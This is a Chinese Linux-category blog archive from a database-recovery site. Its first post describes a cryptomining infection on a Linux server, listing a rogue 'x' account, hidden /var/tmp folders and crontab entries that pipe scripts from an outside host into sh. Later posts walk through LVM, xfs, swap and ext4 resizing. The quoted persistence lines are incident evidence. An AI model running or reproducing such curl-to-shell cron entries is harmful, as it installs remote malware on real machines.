标签云
asm恢复 bbed bootstrap$ dul In Memory kcbzib_kcrsds_1 kccpb_sanity_check_2 kfed MySQL恢复 ORA-00312 ORA-00607 ORA-00704 ORA-01110 ORA-01555 ORA-01578 ORA-08103 ORA-600 2131 ORA-600 2662 ORA-600 2663 ORA-600 3020 ORA-600 4000 ORA-600 4137 ORA-600 4193 ORA-600 4194 ORA-600 16703 ORA-600 kcbzib_kcrsds_1 ORA-600 KCLCHKBLK_4 ORA-15042 ORA-15196 ORACLE 12C oracle dul ORACLE PATCH Oracle Recovery Tools oracle加密恢复 oracle勒索 oracle勒索恢复 oracle异常恢复 Oracle 恢复 ORACLE恢复 ORACLE数据库恢复 oracle 比特币 OSD-04016 YOUR FILES ARE ENCRYPTED 勒索恢复 比特币加密文章分类
- Others (2)
- 中间件 (2)
- WebLogic (2)
- 操作系统 (102)
- 数据库 (1,682)
- DB2 (22)
- MySQL (73)
- Oracle (1,544)
- Data Guard (52)
- EXADATA (8)
- GoldenGate (24)
- ORA-xxxxx (159)
- ORACLE 12C (72)
- ORACLE 18C (6)
- ORACLE 19C (15)
- ORACLE 21C (3)
- Oracle 23ai (7)
- Oracle ASM (67)
- Oracle Bug (8)
- Oracle RAC (53)
- Oracle 安全 (6)
- Oracle 开发 (28)
- Oracle 监听 (28)
- Oracle备份恢复 (565)
- Oracle安装升级 (92)
- Oracle性能优化 (62)
- 专题索引 (5)
- 勒索恢复 (79)
- PostgreSQL (18)
- PostgreSQL恢复 (6)
- SQL Server (27)
- SQL Server恢复 (8)
- TimesTen (7)
- 达梦数据库 (2)
- 生活娱乐 (2)
- 至理名言 (11)
- 虚拟化 (2)
- VMware (2)
- 软件开发 (37)
- Asp.Net (9)
- JavaScript (12)
- PHP (2)
- 小工具 (20)
-
最近发表
- 断电引起的ORA-08102: 未找到索引关键字, 对象号 39故障处理
- ORA-00227: corrupt block detected in control file
- 手工删除19c rac
- 解决oracle数据文件路径有回车故障
- .wstop扩展名勒索数据库恢复
- Oracle Recovery Tools工具一键解决ORA-00376 ORA-01110故障(文件offline)
- OGG-02771 Input trail file format RELEASE 19.1 is different from previous trail file form at RELEASE 11.2.
- OGG-02246 Source redo compatibility level 19.0.0 requires trail FORMAT 12.2 or higher
- GoldenGate 19安装和打patch
- dd破坏asm磁盘头恢复
- 删除asmlib磁盘导致磁盘组故障恢复
- Kylin Linux 安装19c
- ORA-600 krse_arc_complete.4
- Oracle 19c 202410补丁(RUs+OJVM)
- ntfs MFT损坏(ntfs文件系统故障)导致oracle异常恢复
- .mkp扩展名oracle数据文件加密恢复
- 清空redo,导致ORA-27048: skgfifi: file header information is invalid
- A_H_README_TO_RECOVER勒索恢复
- 通过alert日志分析客户自行对一个数据库恢复的来龙去脉和点评
- ORA-12514: TNS: 监听进程不能解析在连接描述符中给出的SERVICE_NAME
分类目录归档:Linux
记录一种挖矿病毒现象
最近有朋友遇到linux系统不行被注入了挖矿病毒,大概记录下存在问题
在/etc/passwd文件中有x用户
x:x:2001:2001::/home/x:/bin/bash
在root和x用户的crontab中有恶意执行任务
[root@localhost tmp]# crontab -u x -l * * * * * /var/tmp/.systemd/.systemd * * * * * /var/tmp/.update/.update */10 * * * * curl -fsSL http://pw.pwndns.pw/update.sh | sh -s uc @reboot curl -fsSL http://pw.pwndns.pw/reboot.sh | sh [root@localhost tmp]# crontab -l * * * * * /var/tmp/.systemd/.systemd */5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh
在/var/tmp下面有.systemd和.update文件夹
[root@localhost tmp]# ls -lart /var/tmp/ drwxr-xr-x 2 x tape 37 Jul 27 21:49 .systemd drwxr-xr-x 2 x tape 36 Jul 27 21:49 .update
lvm缩小xfs文件系统空间和对swap进行扩容操作
xfs文件系统lvm缩小空间操作(/home从100G减小到80G)
[root@xifenfei ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/rhel-root 449G 6.0G 443G 2% / devtmpfs 63G 0 63G 0% /dev tmpfs 63G 0 63G 0% /dev/shm tmpfs 63G 20M 63G 1% /run tmpfs 63G 0 63G 0% /sys/fs/cgroup /dev/mapper/rhel-home 100G 38M 100G 1% /home /dev/sda2 1014M 165M 850M 17% /boot /dev/sda1 200M 9.8M 191M 5% /boot/efi tmpfs 13G 4.0K 13G 1% /run/user/42 tmpfs 13G 32K 13G 1% /run/user/0 /dev/sr0 4.2G 4.2G 0 100% /media [root@xifenfei u01]# xfsdump -f /home.xfsdump /home xfsdump: using file dump (drive_simple) strategy xfsdump: version 3.1.7 (dump format 3.0) - type ^C for status and control ============================= dump label dialog ============================== please enter label for this dump session (timeout in 300 sec) -> home session label entered: "tar czvf /home.tar.gz /home home" --------------------------------- end dialog --------------------------------- xfsdump: level 0 dump of xifenfei:/home xfsdump: dump date: Fri Jun 25 11:37:13 2021 xfsdump: session id: 4d75008e-9927-417d-9722-52d13bb89eb0 xfsdump: session label: xfsdump: ino map phase 1: constructing initial dump list xfsdump: ino map phase 2: skipping (no pruning necessary) xfsdump: ino map phase 3: skipping (only one dump stream) xfsdump: ino map construction complete xfsdump: estimated dump size: 4828224 bytes xfsdump: /var/lib/xfsdump/inventory created ============================= media label dialog ============================= please enter label for media in drive 0 (timeout in 300 sec) -> home media label entered: "home" --------------------------------- end dialog --------------------------------- xfsdump: creating dump session media file 0 (media 0, file 0) xfsdump: dumping ino map xfsdump: dumping directories xfsdump: dumping non-directory files xfsdump: ending media file xfsdump: media file size 4732672 bytes xfsdump: dump size (non-dir files) : 4588480 bytes xfsdump: dump complete: 4 seconds elapsed xfsdump: Dump Summary: xfsdump: stream 0 /home.xfsdump OK (success) xfsdump: Dump Status: SUCCESS [root@xifenfei u01]# umount /home [root@xifenfei u01]# lvreduce -L 80G /dev/mapper/rhel-home WARNING: Reducing active logical volume to 80.00 GiB. THIS MAY DESTROY YOUR DATA (filesystem etc.) Do you really want to reduce rhel/home? [y/n]: y Size of logical volume rhel/home changed from 100.00 GiB (25600 extents) to 80.00 GiB (20480 extents). Logical volume rhel/home successfully resized. [root@xifenfei u01]# mkfs.xfs -f /dev/mapper/rhel-home meta-data=/dev/mapper/rhel-home isize=512 agcount=16, agsize=1310720 blks = sectsz=512 attr=2, projid32bit=1 = crc=1 finobt=0, sparse=0 data = bsize=4096 blocks=20971520, imaxpct=25 = sunit=64 swidth=64 blks naming =version 2 bsize=4096 ascii-ci=0 ftype=1 log =internal log bsize=4096 blocks=10240, version=2 = sectsz=512 sunit=64 blks, lazy-count=1 realtime =none extsz=4096 blocks=0, rtextents=0 [root@xifenfei u01]# mount /home xfsrestore -f /home.xfsdump /home [root@xifenfei u01]# xfsrestore -f /home.xfsdump /home xfsrestore: using file dump (drive_simple) strategy xfsrestore: version 3.1.7 (dump format 3.0) - type ^C for status and control xfsrestore: searching media for dump xfsrestore: examining media file 0 xfsrestore: dump description: xfsrestore: hostname: xifenfei xfsrestore: mount point: /home xfsrestore: volume: /dev/mapper/rhel-home xfsrestore: session time: Fri Jun 25 11:37:13 2021 xfsrestore: level: 0 xfsrestore: session label: "tar czvf /home.tar.gz /home home" xfsrestore: media label: "home" xfsrestore: file system id: b996cff9-332b-4c07-96e1-8335a1f23627 xfsrestore: session id: 4d75008e-9927-417d-9722-52d13bb89eb0 xfsrestore: media id: 6094b9b5-a45f-4638-a0e2-c1b982ead67b xfsrestore: using online session inventory xfsrestore: searching media for directory dump xfsrestore: reading directories xfsrestore: 119 directories and 188 entries processed xfsrestore: directory post-processing xfsrestore: restoring non-directory files xfsrestore: restore complete: 0 seconds elapsed xfsrestore: Restore Summary: xfsrestore: stream 0 /home.xfsdump OK (success) xfsrestore: Restore Status: SUCCESS [root@xifenfei u01]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/rhel-root 449G 14G 435G 4% / devtmpfs 63G 0 63G 0% /dev tmpfs 63G 20M 63G 1% /run tmpfs 63G 0 63G 0% /sys/fs/cgroup /dev/sda2 1014M 165M 850M 17% /boot /dev/sda1 200M 9.8M 191M 5% /boot/efi tmpfs 13G 4.0K 13G 1% /run/user/42 tmpfs 13G 28K 13G 1% /run/user/0 /dev/sr0 4.2G 4.2G 0 100% /media tmpfs 63G 0 63G 0% /dev/shm /dev/mapper/rhel-home 80G 38M 80G 1% /home
xfs系统的lvm无法直接缩小空间,只能是通过xfsdump /home内容,然后lvm缩小空间重做xfs文件系统,再使用xfsdump还原
lvm扩容swap空间(swap从8G扩大到16G)
[root@xifenfei home]# free -m total used free shared buff/cache available Mem: 128355 86907 26110 274 15338 37632 Swap: 8192 0 8192 [root@xifenfei home]# lvextend -L 16GB /dev/rhel/swap Size of logical volume rhel/swap changed from 8.00 GiB (2048 extents) to 16.00 GiB (4096 extents). Logical volume rhel/swap successfully resized. [root@xifenfei home]# sync;sync [root@xifenfei home]# swapoff /dev/rhel/swap mkswap /dev/rhel/swap [root@xifenfei home]# mkswap /dev/rhel/swap mkswap: /dev/rhel/swap: warning: wiping old swap signature. swapon /dev/rhel/swap Setting up swapspace version 1, size = 16777212 KiB no label, UUID=8d79ccf4-1796-49c9-968d-23abb67bc6eb [root@xifenfei home]# swapon /dev/rhel/swap [root@xifenfei home]# free -m total used free shared buff/cache available Mem: 128355 86907 26110 274 15338 37632 Swap: 16383 0 16383
ext4 lvm在线扩容
文件系统格式
[root@xifenfei~]# uname -a Linux datacenter 4.1.12-61.1.28.el6uek.x86_64 #2 SMP Thu Feb 23 20:03:53 PST 2017 x86_64 x86_64 x86_64 GNU/Linux [root@xifenfei~]# mount /dev/mapper/vg_datacenter-lv_root on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext4 (rw) /dev/mapper/vg_datacenter-lv_home on /home type ext4 (rw) /dev/mapper/vg_datacenter-lvu01 on /u01 type ext4 (rw) /dev/sdb1 on /oracle_data type ext4 (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw) [root@datacenter ~]#
linux扫描新磁盘
[root@xifenfei ~]# ls /sys/class/scsi_host/ host0 host1 host2 [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host0/scan [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host1/scan [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host2/scan
vg扩容
[root@xifenfei ~]# pvcreate /dev/sdc1 Physical volume "/dev/sdc1" successfully created [root@xifenfei ~]# vgs VG #PV #LV #SN Attr VSize VFree vg_xifenfei 1 4 0 wz--n- 499.51g 584.00m [root@xifenfei ~]# vgextend vg_xifenfei /dev/sdc1 Volume group "vg_xifenfei" successfully extended [root@xifenfei ~]# vgs VG #PV #LV #SN Attr VSize VFree vg_xifenfei 2 4 0 wz--n- 999.50g 500.56g
lv进行扩容
[root@xifenfei ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_xifenfei-lv_root 50G 6.4G 41G 14% / tmpfs 63G 0 63G 0% /dev/shm /dev/sda1 477M 84M 364M 19% /boot /dev/mapper/vg_xifenfei-lv_home 1.9G 29M 1.8G 2% /home /dev/mapper/vg_xifenfei-lvu01 436G 335G 80G 81% /u01 /dev/sdb1 985G 462G 473G 50% /oracle_data [root@xifenfei ~]# lvresize -L +500G /dev/mapper/vg_xifenfei-lvu01 Size of logical volume vg_xifenfei/lvu01 changed from 443.00 GiB (113408 extents) to 943.00 GiB (241408 extents). Logical volume lvu01 successfully resized. [root@xifenfei ~]# resize2fs /dev/mapper/vg_xifenfei-lvu01 resize2fs 1.43-WIP (20-Jun-2013) Filesystem at /dev/mapper/vg_xifenfei-lvu01 is mounted on /u01; on-line resizing required old_desc_blocks = 28, new_desc_blocks = 59 The filesystem on /dev/mapper/vg_xifenfei-lvu01 is now 247201792 blocks long. [root@xifenfei ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_xifenfei-lv_root 50G 6.4G 41G 14% / tmpfs 63G 0 63G 0% /dev/shm /dev/sda1 477M 84M 364M 19% /boot /dev/mapper/vg_xifenfei-lv_home 1.9G 29M 1.8G 2% /home /dev/mapper/vg_xifenfei-lvu01 929G 335G 552G 38% /u01 /dev/sdb1 985G 462G 473G 50% /oracle_data